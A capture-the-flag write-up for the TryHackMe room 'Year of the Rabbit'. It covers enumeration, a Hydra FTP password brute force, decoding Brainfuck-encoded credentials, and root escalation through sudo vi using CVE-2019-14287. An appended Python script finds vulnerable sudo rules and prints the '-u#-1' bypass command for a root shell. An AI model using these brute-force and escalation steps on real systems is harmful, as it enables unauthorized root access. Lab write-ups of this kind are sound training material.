[EN] TryHackMe — Year of the Rabbit Write-Up

Anıl Çelik
May 19, 2020


(April 2020)

Hello guys, it’s Anil Celik, a.k.a. your friendly pwner 0xpr0N3rd on THM. Today I will share my write-up for the room named Year of the Rabbit (https://tryhackme.com/room/yearoftherabbit).

I really enjoyed solving this box and thought it deserved a write-up. By the way, this is my very first write-up on THM, so I hope you will enjoy it.

  • As usual, let’s start with our initial nmap scan:
  • Hmm, it seems we got something useful. Before going further with a more detailed nmap scan (such as using the -p- parameter to scan all 65535 ports on the machine), let’s start enumerating what we already have.
  • nmap didn’t report that anonymous FTP login is allowed, but I wanted to check whether I could log in to the FTP service as anonymous anyway; that didn’t work. I also couldn’t find any known vulnerability for this FTP service version, neither on searchsploit nor anywhere else:
  • The SSH service doesn’t look vulnerable either. So, let’s move on to the HTTP port for enumeration:
  • When we go to port 80, we are welcomed by the default Apache page. Let’s try to find hidden directories with gobuster:
  • Seems like we found something interesting, “/assets”; let’s go deeper:
  • When we go to /assets, we see there are two files. The first one is Rick Astley’s classic Never Gonna Give You Up, which is useless in this case even though it’s a really good song. Next, let’s inspect style.css:
  • At last, something useful. Let’s go to this directory:
  • Let me be honest with you: the moment I saw this I thought something was going on in the back-end and that I needed to intercept this traffic. So, go ahead and fire up your Burp Suite!
  • Seems like my scepticism was right: we found another hidden directory. Let’s go there:
  • Oh, cool! Candy! Let’s see the inside of it:
  • This photo reminded me of the legendary Turkish actress Gulsen Bubikoglu (maybe it’s a drawing of her, I honestly don’t know). At this point, I thought there was something hidden inside this picture, because we don’t have anything else to go on. Let’s download it. Friendly reminder: to download a file without the browser touching its bytes, using “wget” instead of a regular “Right-Click + Save” is more reliable.
  • First things first, let’s check its EXIF metadata:
  • Hmm, nothing satisfying there. Anyway, we still have one more option: strings! Let’s run strings on it:
  • JACKPOT! We get the FTP username and a list of password candidates. What we can do here is put all these candidate password strings into a text file and… HAIL HYDRA!
  • Thank you, Hydra. Let’s connect to the FTP server and look for something special:
  • We downloaded “Eli’s_Creds.txt”. That might be something, right? Open it immediately!
  • Ah, shoot. Here we go again. I guess this one is a real rabbit hole. Anyway, after research that cost me an hour, I found that these characters are a program in the esoteric programming language named Brainfuck (don’t blame me, that’s its name). Running it prints the credentials, so let’s decode it:
  • Dude, finally! Don’t waste any more time and open an SSH connection as eli immediately:
  • We are in! Let’s look for user.txt, shall we?
  • Well, user.txt is not here, nor anywhere eli has permission to read. After a bit more enumeration, I see that user.txt is owned by a user named gwendoline:
  • Note that when we first connected over SSH, there was a message which might light our way:
  • Dude, there is a message from root to gwendoline! Let’s find it:
  • I guess that’s gwendoline’s password. Try it:
  • Yassss! We got the user! From here, let’s try to escalate our privileges. First, I prefer to check SUID binaries to see whether there is a misconfigured SUID bit that can be exploited (the 2>/dev/null just hides the permission-denied noise): (find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null)
  • I tried to find a way to abuse the SUID binaries we have access to, but nothing worked. Let’s go for “sudo -l”:
  • For those who may not know what “sudo -l” is: it lists the sudo rules that apply to the user we are currently logged in as. From the output above, we can see that gwendoline can run /usr/bin/vi on /home/gwendoline/user.txt through sudo. Hmm, maybe there is something useful for this on GTFOBins; let’s check:
  • Bingo! Let’s try it:
  • :///////////////////////////////// At this point, I really got stuck and went to search more commands to exploit this sudo command. At the end, when it was 5 a.m. and when my brain was about to melt, I found a vulnerability that can help me (thanks to Ekko ❤), this vulnerability is CVE-2019–14287:
  • When we go down, we can see something like:
  • Yes, this is the command that will help us:
  • When we enter the command above, Vim opens; then we go to its command line by typing “:” and “!/bin/sh”, which drops us into a shell:
  • That’s it! Go and capture the flag!
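As an added example (this is not code from the original write-up): a small Brainfuck interpreter for decoding a file like Eli’s_Creds.txt locally, instead of pasting credentials into some random web decoder. The HELLO program is the well-known “Hello World!” Brainfuck program and exercises the loop handling; the credential text round-tripped below is constructed and is not the room’s real password.

```python
# Added example: a minimal Brainfuck interpreter (not part of the original
# write-up). SAMPLE_CREDS_BF is a constructed stand-in for Eli's_Creds.txt.

def run_bf(program: str, stdin: str = "", tape_size: int = 30000) -> str:
    """Execute a Brainfuck program and return everything it printed.

    Cells are unsigned bytes (wrap at 256). Characters that are not one of
    the eight commands are ignored, so a file with stray newlines still runs.
    """
    code = [c for c in program if c in "<>+-.,[]"]
    # Pre-compute matching brackets so loops are O(1) jumps.
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = bytearray(tape_size)
    ptr, pc, out = 0, 0, []
    inp = iter(stdin.encode())          # ',' reads one byte, 0 at EOF
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = next(inp, 0)
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]               # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]               # jump back to the matching '['
        pc += 1
    return "".join(out)


def encode_bf(text: str) -> str:
    """Naive encoder: nudge a single cell to each character and print it.

    Only used here to construct the sample; real generators emit loops
    (as HELLO does), which is why the interpreter needs bracket support.
    """
    out, cur = [], 0
    for ch in text:
        delta = ord(ch) - cur
        out.append(("+" if delta > 0 else "-") * abs(delta) + ".")
        cur = ord(ch)
    return "".join(out)


# Canonical "Hello World!\n" program (as on Wikipedia); it uses nested loops.
HELLO = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++.."
         "+++.>>.<-.<.+++.------.--------.>>+.>++.")

# Constructed stand-in for the contents of Eli's_Creds.txt (NOT the real creds).
SAMPLE_CREDS_BF = encode_bf("User: eli\nPassword: NotTheRealOne123\n")

if __name__ == "__main__":
    print(run_bf(HELLO), end="")
    print(run_bf(SAMPLE_CREDS_BF), end="")
```

Usage: save the room’s file as-is and call run_bf(open("Eli's_Creds.txt").read()); anything that is not a Brainfuck command is skipped, so trailing newlines or copy-paste whitespace don’t matter. The interpreter raises on unbalanced brackets rather than looping forever, which is the failure mode you hit when a file was truncated on download.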

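As a second added example (again not from the original write-up), for the “sudo -l” step and the CVE-2019-14287 step together: a small triage script that parses a sudo -l listing, picks out rules of the shape “(ALL, !root)”, and prints the “-u#-1” command that would run as root on a sudo older than 1.8.28. The listing below is constructed in the shape the write-up describes; the hostname, the NOPASSWD tag, the second rule and the sudo version are assumptions, not facts about the room.

```python
# Added example: triage a "sudo -l" listing for CVE-2019-14287.
# Not code from the original write-up; SAMPLE_LISTING is constructed.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# sudo 1.8.28 started rejecting uid/gid -1; everything older lets "-u#-1" through.
FIXED_VERSION = (1, 8, 28)


@dataclass
class SudoRule:
    runas_users: List[str] = field(default_factory=list)
    runas_groups: List[str] = field(default_factory=list)
    tags: List[str] = field(default_factory=list)
    command: str = ""


# "(users : groups) TAG: TAG: command"  -- the groups part is optional.
RULE_RE = re.compile(
    r"^\s*\((?P<users>[^:)]*)(?::(?P<groups>[^)]*))?\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def _split(spec: Optional[str]) -> List[str]:
    return [x.strip() for x in (spec or "").split(",") if x.strip()]


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Pull the rule lines out of `sudo -l` output (everything after 'may run')."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append(SudoRule(
            runas_users=_split(m["users"]),
            runas_groups=_split(m["groups"]),
            tags=[t.strip(": ") for t in m["tags"].split() if t.strip(": ")],
            command=m["cmd"],
        ))
    return rules


def parse_version(v: str) -> tuple:
    """'1.8.16p1' -> (1, 8, 16); the 'pN' patch suffix does not matter here."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def allows_everyone_but_root(rule: SudoRule) -> bool:
    """The vulnerable shape: runas ALL with root explicitly excluded."""
    users = {u.lower() for u in rule.runas_users}
    return "all" in users and "!root" in users


def cve_2019_14287_bypasses(listing: str, sudo_version: str) -> List[str]:
    """Return the exact commands that would run as root on an unpatched sudo.

    Why -u#-1 works: sudo parses "-1" into the uid 4294967295, which is not 0,
    so the "!root" blocklist check passes; but setresuid(2) treats -1 as
    "leave this id unchanged", and by then sudo is already running as uid 0.
    Without NOPASSWD the invoking user's own password is still required.
    """
    if parse_version(sudo_version) >= FIXED_VERSION:
        return []
    return [f"sudo -u#-1 {r.command}" for r in parse_sudo_l(listing)
            if allows_everyone_but_root(r)]


# Constructed listing in the shape the write-up describes. The hostname, the
# NOPASSWD tag and the second (harmless, root-only) rule are assumptions.
SAMPLE_LISTING = """\
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
    (root) /usr/bin/id
"""

if __name__ == "__main__":
    for cmd in cve_2019_14287_bypasses(SAMPLE_LISTING, "1.8.16p1"):  # assumed version
        print(cmd)
```

On the target you would feed it the real output of sudo -l and sudo -V. If a command is printed, run it; vi opens as uid 0, and “:!/bin/sh” then gives a root shell (check with id). On sudo 1.8.28 or newer the same “-u#-1” is rejected with an error, which is exactly what the version gate in the script reflects.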
That was all I wanted to share with you.

Hope you guys enjoyed this, thank you for reading!

Hopefully, see you in my next write-ups!
